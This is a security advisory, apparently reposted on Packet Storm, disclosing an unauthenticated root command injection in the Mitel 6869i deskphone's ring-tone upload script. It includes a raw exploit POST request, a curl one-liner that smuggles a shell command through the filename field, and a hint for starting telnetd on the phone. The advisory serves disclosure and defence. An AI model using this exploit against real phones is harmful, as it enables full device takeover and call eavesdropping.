what you don't know can hurt you

Mitel 6869i Voip Deskphone 4.2.2032 Command Injection

Mitel 6869i Voip Deskphone 4.2.2032 Command Injection
Posted Aug 11, 2019
Authored by Axel Rengstorf

Mitel 6869i Voip Deskphone version 4.2.2032 suffer from an unauthenticated command injection vulnerability.

tags | exploit
MD5 | 3005ed68dcdba54b2f53286608070574

Mitel 6869i Voip Deskphone 4.2.2032 Command Injection

Change Mirror Download
BlueBox Security
http://www.bluebox-security.de/ security(at)bluebox-security.de
bbs-2019.001.txt 08-August-2019
____________________________________________________________________________

Vendor: Mitel
Affected Products: Mitel 6869i Voip Deskphone Version 4.2.2032 - SIP
Not Affected: unknown
Vulnerability: Mitel 6869i SIP Deskphone 4.2.2032: Unauthenticated Bash
Command Injection Vulnerability with Root Priviledges in
/cgi-bin/webuploadconfig script
Risk: High
____________________________________________________________________________

Vendor communication:
2019/08/08 BlueBox Security releases this advisory
____________________________________________________________________________

Overview:
--------
The Mitel 6869i is a desktop VoIP phone offering telephony features.
A webservice running on the TCP Port 49249 is used to administrate the phone's
VoIP settings, upgrade the firmware and change security settings.

Description:
--------

The Webserver on port 49249 of the Mitel 6869i phone is using the "webuploadconfig" cgi-script,
an arm linux elf executable file, to upload ring tone audio files to the
phone with the page=upload_ringtone parameter.
The execution of this cgi-script does not require prior authentication.
Futhermore the script is vulnerable to Bash Command Injection.
The filename value of the POST request is used unsanitized in a system() call.

The vulnerable POST request to the webuploadconfig-script is the following:

POST //cgi-bin/webuploadconfig?page=upload_ringtone&action=submit&section=0&conn=1 HTTP/1.1
Host: 192.168.178.147:49249
User-Agent: curl/7.65.1
Accept: */*
Content-Length: 185
Content-Type: multipart/form-data; boundary=------------------------2754e6a90f270263
Connection: close

--------------------------2754e6a90f270263
Content-Disposition: form-data; name="file"; filename="`ping -c 1 192.168.178.140`"

pwned
--------------------------2754e6a90f270263--


By inserting "|command", "`command`" or "$(command) as the value of the "filename" parameter
the "command" is executed on the underlying linux operating system.

The following linux bash commandline exploits this vulnerability and executes the
command "ping -c 1 192.168.178.140" on the Mitel 6869i phone with the IP Adress
192.168.178.147 with root priviledges:

$ echo "pwned" | curl -F "file=@-;filename=\`ping -c 1 192.168.178.140\`" \
"http://192.168.178.147:49249//cgi-bin/webuploadconfig?page=upload_ringtone&action=submit&section=0&conn=1"

To verify the successfull completion of the ping-command on the Mitel 6869i
phone, start tcpdump on the host system and listen for incoming icmp requests.
(eg by running tcpdump -i eth0 -n icmp)

The "webuploadconfig" cgi-script also runs with superuser root-priviledges as
the telnetd service can be started on the restricted TCP-port 23 by replacing
the ping-command with "telnetd &".

Impact:
--------
The described problems allow an unauthenticated attacker to run arbitary linux
operating system commands with root-priledges. This leads to a complete comprimise
of the Mitel 6869i phone and therefore also the possibility to eavesdrop on the
victim's calls.

Solution
--------
We recommend to properly perform input parsing of the filename parameter to avoid
Command Injection vulnerabilities.
As a quick fix blocking access to the port 49249 is advisable.

________________________________________________________________________

Credits:
Bug found by Axel Rengstorf <ar@bluebox-security.de> of Bluebox Security
________________________________________________________________________

References:
This Advisory and Upcoming Advisories:
http://bluebox-security.de/advisories.html
________________________________________________________________________

About BlueBox Security:
BlueBox Security is a vendor-independent security consulting company
specialising in the areas of voip/pbx telephone infrastructures security
analysis, source code audits and analysis of iot/embedded systems.

https://www.bluebox-security.de
Contact: ar@bluebox-secuurity.de

Copyright Notice:
Unaltered electronic reproduction of this advisory is permitted. For all
other reproduction or publication, in printing or otherwise, contact
security@bluebox-security.de for permission. Use of the advisory constitutes
acceptance for use in an "as is" condition. All warranties are excluded.
In no event shall BlueBox Security be liable for any damages whatsoever including
direct, indirect, incidental, consequential, loss of business profits or
special damages, even if the author has been advised of the possibility of
such damages.

Copyright 2019 Axel Rengstorf. All rights reserved. Terms of use apply.



Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

August 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    10 Files
  • 2
    Aug 2nd
    8 Files
  • 3
    Aug 3rd
    2 Files
  • 4
    Aug 4th
    1 Files
  • 5
    Aug 5th
    15 Files
  • 6
    Aug 6th
    79 Files
  • 7
    Aug 7th
    16 Files
  • 8
    Aug 8th
    11 Files
  • 9
    Aug 9th
    10 Files
  • 10
    Aug 10th
    0 Files
  • 11
    Aug 11th
    6 Files
  • 12
    Aug 12th
    26 Files
  • 13
    Aug 13th
    15 Files
  • 14
    Aug 14th
    19 Files
  • 15
    Aug 15th
    52 Files
  • 16
    Aug 16th
    11 Files
  • 17
    Aug 17th
    1 Files
  • 18
    Aug 18th
    2 Files
  • 19
    Aug 19th
    18 Files
  • 20
    Aug 20th
    19 Files
  • 21
    Aug 21st
    17 Files
  • 22
    Aug 22nd
    9 Files
  • 23
    Aug 23rd
    3 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close